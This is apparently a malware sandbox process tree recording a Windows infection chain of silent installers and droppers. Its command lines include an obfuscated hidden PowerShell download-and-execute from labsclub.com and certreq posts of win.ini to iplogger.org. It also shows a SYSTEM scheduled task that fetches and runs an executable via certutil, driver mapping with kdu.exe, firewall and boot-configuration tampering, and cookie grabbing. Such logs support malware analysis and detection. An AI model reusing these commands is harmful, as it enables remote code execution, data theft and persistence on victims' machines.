C:\Users\Admin\AppData\Roaming\1614545031579.exe"C:\Users\Admin\AppData\Roaming\1614545031579.exe" /sjson "C:\Users\Admin\AppData\Roaming\1614545031579.txt"6⤵PID:4776
-
-
C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exeC:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"6⤵PID:5960
-
-
C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP6⤵PID:7152
-
-
C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exeC:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe /silent6⤵PID:2264
-
C:\Users\Admin\AppData\Local\Temp\is-72HFE.tmp\23E04C4F32EF2158.tmp"C:\Users\Admin\AppData\Local\Temp\is-72HFE.tmp\23E04C4F32EF2158.tmp" /SL5="$401F8,746887,121344,C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe" /silent7⤵PID:4912
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c "start https://iplogger.org/14Zhe7"8⤵PID:6952
-
-
C:\Program Files (x86)\DTS\seed.sfx.exe"C:\Program Files (x86)\DTS\seed.sfx.exe" -pX7mdks39WE0 -s18⤵PID:6988
-
C:\Program Files (x86)\Seed Trade\Seed\seed.exe"C:\Program Files (x86)\Seed Trade\Seed\seed.exe"9⤵PID:6140
-
-
C:\Program Files (x86)\Seed Trade\Seed\seed.exe"C:\Program Files (x86)\Seed Trade\Seed\seed.exe"9⤵PID:6152
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\26FF190E7AE0F7C7.exe"6⤵PID:6096
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 37⤵
- Runs ping.exe
PID:5424
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\26FF190E7AE0F7C7.exeC:\Users\Admin\AppData\Local\Temp\26FF190E7AE0F7C7.exe 200 installp15⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
PID:3228 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:2160
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
PID:4100
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\26FF190E7AE0F7C7.exe"6⤵PID:4440
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 37⤵
- Runs ping.exe
PID:4672
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"5⤵
- Suspicious use of WriteProcessMemory
PID:2968 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 36⤵
- Runs ping.exe
PID:3284
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe"4⤵PID:3968
-
C:\Users\Admin\AppData\Local\Temp\NOWJBGHR9N\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\NOWJBGHR9N\multitimer.exe" 0 3060197d33d91c80.94013368 0 1015⤵PID:2052
-
C:\Users\Admin\AppData\Local\Temp\NOWJBGHR9N\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\NOWJBGHR9N\multitimer.exe" 1 3.1614545239.603c01574b346 1016⤵PID:4472
-
C:\Users\Admin\AppData\Local\Temp\NOWJBGHR9N\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\NOWJBGHR9N\multitimer.exe" 2 3.1614545239.603c01574b3467⤵PID:4568
-
C:\Users\Admin\AppData\Local\Temp\ct0u0yod2in\jw3ki4z0by4.exe"C:\Users\Admin\AppData\Local\Temp\ct0u0yod2in\jw3ki4z0by4.exe" /VERYSILENT8⤵PID:4752
-
C:\Users\Admin\AppData\Local\Temp\is-QNFGG.tmp\jw3ki4z0by4.tmp"C:\Users\Admin\AppData\Local\Temp\is-QNFGG.tmp\jw3ki4z0by4.tmp" /SL5="$9011A,870426,780800,C:\Users\Admin\AppData\Local\Temp\ct0u0yod2in\jw3ki4z0by4.exe" /VERYSILENT9⤵PID:4104
-
C:\Users\Admin\AppData\Local\Temp\is-RJNNQ.tmp\winlthst.exe"C:\Users\Admin\AppData\Local\Temp\is-RJNNQ.tmp\winlthst.exe" test1 test110⤵PID:1504
-
C:\Users\Admin\AppData\Local\Temp\BM0081UIn.exe"C:\Users\Admin\AppData\Local\Temp\BM0081UIn.exe"11⤵PID:6788
-
C:\Users\Admin\AppData\Local\Temp\BM0081UIn.exe"C:\Users\Admin\AppData\Local\Temp\BM0081UIn.exe"12⤵PID:2348
-
C:\Users\Admin\AppData\Local\Temp\1614545090745.exe"C:\Users\Admin\AppData\Local\Temp\1614545090745.exe"13⤵PID:6412
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe14⤵PID:7760
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"11⤵PID:6300
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"12⤵PID:7708
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3uci3oedvp4\vict.exe"C:\Users\Admin\AppData\Local\Temp\3uci3oedvp4\vict.exe" /VERYSILENT /id=5358⤵PID:4464
-
C:\Users\Admin\AppData\Local\Temp\is-2FEAL.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-2FEAL.tmp\vict.tmp" /SL5="$90058,870426,780800,C:\Users\Admin\AppData\Local\Temp\3uci3oedvp4\vict.exe" /VERYSILENT /id=5359⤵PID:2216
-
C:\Users\Admin\AppData\Local\Temp\is-L5T9I.tmp\wimapi.exe"C:\Users\Admin\AppData\Local\Temp\is-L5T9I.tmp\wimapi.exe" 53510⤵PID:4816
-
C:\Users\Admin\AppData\Local\Temp\KYbmxrJmM.exe"C:\Users\Admin\AppData\Local\Temp\KYbmxrJmM.exe"11⤵PID:6808
-
C:\Users\Admin\AppData\Local\Temp\KYbmxrJmM.exe"C:\Users\Admin\AppData\Local\Temp\KYbmxrJmM.exe"12⤵PID:6632
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"11⤵PID:7364
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"12⤵PID:5844
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\cpdopndowqc\vpn.exe"C:\Users\Admin\AppData\Local\Temp\cpdopndowqc\vpn.exe" /silent /subid=4828⤵PID:1100
-
C:\Users\Admin\AppData\Local\Temp\is-HC56M.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-HC56M.tmp\vpn.tmp" /SL5="$1036C,15170975,270336,C:\Users\Admin\AppData\Local\Temp\cpdopndowqc\vpn.exe" /silent /subid=4829⤵PID:4536
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "10⤵PID:6420
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090111⤵PID:6720
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "10⤵PID:6432
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap090111⤵PID:4016
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall10⤵PID:2228
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install10⤵PID:4952
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\22xxc5zeexs\chashepro3.exe"C:\Users\Admin\AppData\Local\Temp\22xxc5zeexs\chashepro3.exe" /VERYSILENT8⤵PID:4180
-
C:\Users\Admin\AppData\Local\Temp\is-AJNU4.tmp\chashepro3.tmp"C:\Users\Admin\AppData\Local\Temp\is-AJNU4.tmp\chashepro3.tmp" /SL5="$1036E,3362400,58368,C:\Users\Admin\AppData\Local\Temp\22xxc5zeexs\chashepro3.exe" /VERYSILENT9⤵PID:4452
-
C:\Program Files (x86)\JCleaner\gl.exe"C:\Program Files (x86)\JCleaner\gl.exe"10⤵PID:4424
-
C:\Program Files (x86)\JCleaner\gl.exe"C:\Program Files (x86)\JCleaner\gl.exe"11⤵PID:7128
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1hTS97"10⤵PID:4916
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c certreq -post -config https://iplogger.org/1hTS97 %windir%\\win.ini %temp%\\2 & del %temp%\\210⤵PID:3324
-
C:\Windows\SysWOW64\certreq.execertreq -post -config https://iplogger.org/1hTS97 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\211⤵PID:4176
-
-
-
C:\Program Files (x86)\JCleaner\ww.exe"C:\Program Files (x86)\JCleaner\ww.exe"10⤵PID:5224
-
C:\Program Files (x86)\JCleaner\ww.exe"C:\Program Files (x86)\JCleaner\ww.exe"11⤵PID:7020
-
-
-
C:\Program Files (x86)\JCleaner\jayson.exe"C:\Program Files (x86)\JCleaner\jayson.exe"10⤵PID:5216
-
C:\Program Files (x86)\JCleaner\jayson.exe"C:\Program Files (x86)\JCleaner\jayson.exe"11⤵PID:7012
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1aSny7"10⤵PID:5208
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c "start https://iplogger.org/1aSny7"10⤵PID:5200
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c certreq -post -config https://iplogger.org/1aSny7 %windir%\\win.ini %temp%\\2 & del %temp%\\210⤵PID:5192
-
C:\Windows\SysWOW64\certreq.execertreq -post -config https://iplogger.org/1aSny7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\211⤵PID:1056
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c certreq -post -config https://iplogger.org/1EaGq7 %windir%\\win.ini %temp%\\2 & del %temp%\\210⤵PID:5184
-
C:\Windows\SysWOW64\certreq.execertreq -post -config https://iplogger.org/1EaGq7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\211⤵PID:4740
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c "start https://iplogger.org/1EaGq7"10⤵PID:5176
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1EaGq7"10⤵PID:5168
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\gfc2bvbcpuq\app.exe"C:\Users\Admin\AppData\Local\Temp\gfc2bvbcpuq\app.exe" /8-238⤵PID:2640
-
C:\Users\Admin\AppData\Local\Temp\rKuSdIHJXcsFnOtHgUyk\kdu.exeC:\Users\Admin\AppData\Local\Temp\rKuSdIHJXcsFnOtHgUyk\kdu.exe -map C:\Users\Admin\AppData\Local\Temp\rKuSdIHJXcsFnOtHgUyk\driver.sys9⤵PID:7564
-
-
C:\Users\Admin\AppData\Local\Temp\gfc2bvbcpuq\app.exe"C:\Users\Admin\AppData\Local\Temp\gfc2bvbcpuq\app.exe" /8-239⤵PID:8036
-
C:\Users\Admin\AppData\Local\Temp\ZioOLrNbgKchFyRGddjOHPzXlZiCb\kdu.exeC:\Users\Admin\AppData\Local\Temp\ZioOLrNbgKchFyRGddjOHPzXlZiCb\kdu.exe -map C:\Users\Admin\AppData\Local\Temp\ZioOLrNbgKchFyRGddjOHPzXlZiCb\driver.sys10⤵PID:6572
-
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"10⤵PID:6008
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes11⤵PID:6544
-
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe /8-2310⤵PID:8008
-
C:\Users\Admin\AppData\Local\Temp\gtdCtFJaAYXajdeIjyCgk\kdu.exeC:\Users\Admin\AppData\Local\Temp\gtdCtFJaAYXajdeIjyCgk\kdu.exe -map C:\Users\Admin\AppData\Local\Temp\gtdCtFJaAYXajdeIjyCgk\driver.sys11⤵PID:7640
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F11⤵
- Creates scheduled task(s)
PID:1712
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F11⤵
- Creates scheduled task(s)
PID:64
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"11⤵PID:6092
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER12⤵
- Modifies boot configuration data using bcdedit
PID:6472
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:12⤵
- Modifies boot configuration data using bcdedit
PID:7172
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:12⤵
- Modifies boot configuration data using bcdedit
PID:3280
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows12⤵
- Modifies boot configuration data using bcdedit
PID:7632
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe12⤵
- Modifies boot configuration data using bcdedit
PID:7832
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe12⤵
- Modifies boot configuration data using bcdedit
PID:5884
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 012⤵
- Modifies boot configuration data using bcdedit
PID:784
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn12⤵
- Modifies boot configuration data using bcdedit
PID:6576
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 112⤵
- Modifies boot configuration data using bcdedit
PID:4388
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}12⤵
- Modifies boot configuration data using bcdedit
PID:6256
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast12⤵
- Modifies boot configuration data using bcdedit
PID:7184
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -timeout 012⤵
- Modifies boot configuration data using bcdedit
PID:3672
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}12⤵
- Modifies boot configuration data using bcdedit
PID:2912
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\lsaojlnmfxx\3zbpiccof5w.exe"C:\Users\Admin\AppData\Local\Temp\lsaojlnmfxx\3zbpiccof5w.exe" /ustwo INSTALL8⤵PID:4396
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 6489⤵
- Program crash
PID:4380
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 6689⤵
- Program crash
PID:3912
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 6729⤵
- Program crash
PID:4988
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 6689⤵
- Program crash
PID:6328
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 8809⤵
- Program crash
PID:6740
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 9209⤵
- Program crash
PID:6408
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 11769⤵
- Program crash
PID:5584
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 11969⤵
- Program crash
PID:6760
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 11009⤵
- Program crash
PID:7080
-
-
-
C:\Users\Admin\AppData\Local\Temp\gbh32ukpkl4\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\gbh32ukpkl4\Setup3310.exe" /Verysilent /subid=5778⤵PID:4132
-
-
C:\Users\Admin\AppData\Local\Temp\nji4wcohnfp\lox3gm3jy35.exe"C:\Users\Admin\AppData\Local\Temp\nji4wcohnfp\lox3gm3jy35.exe" 57a764d042bf88⤵PID:4128
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k "C:\Program Files\43L54VTWIR\43L54VTWI.exe" 57a764d042bf8 & exit9⤵PID:724
-
C:\Program Files\43L54VTWIR\43L54VTWI.exe"C:\Program Files\43L54VTWIR\43L54VTWI.exe" 57a764d042bf810⤵PID:5984
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\hoimjtobtq3\safebits.exe"C:\Users\Admin\AppData\Local\Temp\hoimjtobtq3\safebits.exe" /S /pubid=1 /subid=4518⤵PID:4972
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Roaming\OptioLink\pptlng.dll",pptlng C:\Users\Admin\AppData\Local\Temp\hoimjtobtq3\safebits.exe9⤵PID:6976
-
-
-
C:\Users\Admin\AppData\Local\Temp\0okedxxjmwn\setup_10.2_us3.exe"C:\Users\Admin\AppData\Local\Temp\0okedxxjmwn\setup_10.2_us3.exe" /silent8⤵PID:4964
-
-
C:\Users\Admin\AppData\Local\Temp\hx1e0e1ujm3\yzqrl2zfc2d.exe"C:\Users\Admin\AppData\Local\Temp\hx1e0e1ujm3\yzqrl2zfc2d.exe" testparams8⤵PID:4512
-
C:\Users\Admin\AppData\Roaming\01kdzlo0cts\fjdx0pbfosp.exe"C:\Users\Admin\AppData\Roaming\01kdzlo0cts\fjdx0pbfosp.exe" /VERYSILENT /p=testparams9⤵PID:3916
-
C:\Users\Admin\AppData\Local\Temp\is-TKBTK.tmp\fjdx0pbfosp.tmp"C:\Users\Admin\AppData\Local\Temp\is-TKBTK.tmp\fjdx0pbfosp.tmp" /SL5="$80078,1611272,61440,C:\Users\Admin\AppData\Roaming\01kdzlo0cts\fjdx0pbfosp.exe" /VERYSILENT /p=testparams10⤵PID:4956
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\d5n2zbhpp4m\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\d5n2zbhpp4m\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq8⤵PID:4476
-
C:\Users\Admin\AppData\Local\Temp\is-8K9AD.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-8K9AD.tmp\IBInstaller_97039.tmp" /SL5="$2030A,14464800,721408,C:\Users\Admin\AppData\Local\Temp\d5n2zbhpp4m\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq9⤵PID:696
-
C:\Users\Admin\AppData\Local\Temp\is-8LINK.tmp\{app}\chrome_proxy.exe"C:\Users\Admin\AppData\Local\Temp\is-8LINK.tmp\{app}\chrome_proxy.exe"10⤵PID:4160
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://dropskeyssellbuy.xyz/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=9703910⤵PID:4852
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"4⤵PID:720
-
C:\Users\Admin\AppData\Roaming\F7B4.tmp.exe"C:\Users\Admin\AppData\Roaming\F7B4.tmp.exe"5⤵PID:4384
-
C:\Users\Admin\AppData\Roaming\F7B4.tmp.exe"C:\Users\Admin\AppData\Roaming\F7B4.tmp.exe"6⤵PID:4584
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"5⤵PID:4812
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
PID:4872
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"4⤵PID:4848
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"4⤵PID:4644
-
C:\ProgramData\2842927.31"C:\ProgramData\2842927.31"5⤵PID:4312
-
-
C:\ProgramData\4755778.52"C:\ProgramData\4755778.52"5⤵PID:5232
-
C:\ProgramData\Windows Host\Windows Host.exe"C:\ProgramData\Windows Host\Windows Host.exe"6⤵PID:6104
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"4⤵PID:5548
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵PID:5836
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
PID:6400
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"4⤵PID:6448
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:6820
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:4716
-
-
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2308 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 0C22C3D3D64279B29FDB0A8DADBEF35E C2⤵
- Loads dropped DLL
PID:804
-
-
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:22⤵PID:6836
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:1408
-
C:\Users\Admin\AppData\Local\Temp\is-3QVS2.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-3QVS2.tmp\Setup3310.tmp" /SL5="$701D2,802346,56832,C:\Users\Admin\AppData\Local\Temp\gbh32ukpkl4\Setup3310.exe" /Verysilent /subid=5771⤵PID:428
-
C:\Users\Admin\AppData\Local\Temp\is-5QPL4.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-5QPL4.tmp\Setup.exe" /Verysilent2⤵PID:6048
-
C:\Users\Admin\AppData\Local\Temp\is-25PVO.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-25PVO.tmp\Setup.tmp" /SL5="$302B6,802346,56832,C:\Users\Admin\AppData\Local\Temp\is-5QPL4.tmp\Setup.exe" /Verysilent3⤵PID:4524
-
C:\Users\Admin\AppData\Local\Temp\is-KB8KI.tmp\ProPlugin.exe"C:\Users\Admin\AppData\Local\Temp\is-KB8KI.tmp\ProPlugin.exe" /Verysilent4⤵PID:7028
-
C:\Users\Admin\AppData\Local\Temp\is-E4KM5.tmp\ProPlugin.tmp"C:\Users\Admin\AppData\Local\Temp\is-E4KM5.tmp\ProPlugin.tmp" /SL5="$203EE,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-KB8KI.tmp\ProPlugin.exe" /Verysilent5⤵PID:7108
-
C:\Users\Admin\AppData\Local\Temp\is-EI4UI.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-EI4UI.tmp\Setup.exe"6⤵PID:3800
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"7⤵PID:2144
-
C:\Windows\SYSTEM32\TASKKILL.exeTASKKILL /F /IM chrome.exe8⤵
- Kills process with taskkill
PID:6024
-
-
C:\Windows\regedit.exeregedit /s chrome.reg8⤵
- Runs .reg file with regedit
PID:4224
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c chrome64.bat8⤵PID:6920
-
C:\Windows\system32\mshta.exemshta vbscript:createobject("wscript.shell").run("chrome64.bat h",0)(window.close)9⤵PID:6544
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX1\chrome64.bat" h"10⤵PID:4308
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:/Program Files/Google/Chrome/Application/chrome.exe"11⤵PID:5064
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ffe16fb6e00,0x7ffe16fb6e10,0x7ffe16fb6e2012⤵PID:1780
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1652,106063297095672285,11566282471396764392,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1720 /prefetch:812⤵PID:5044
-
-
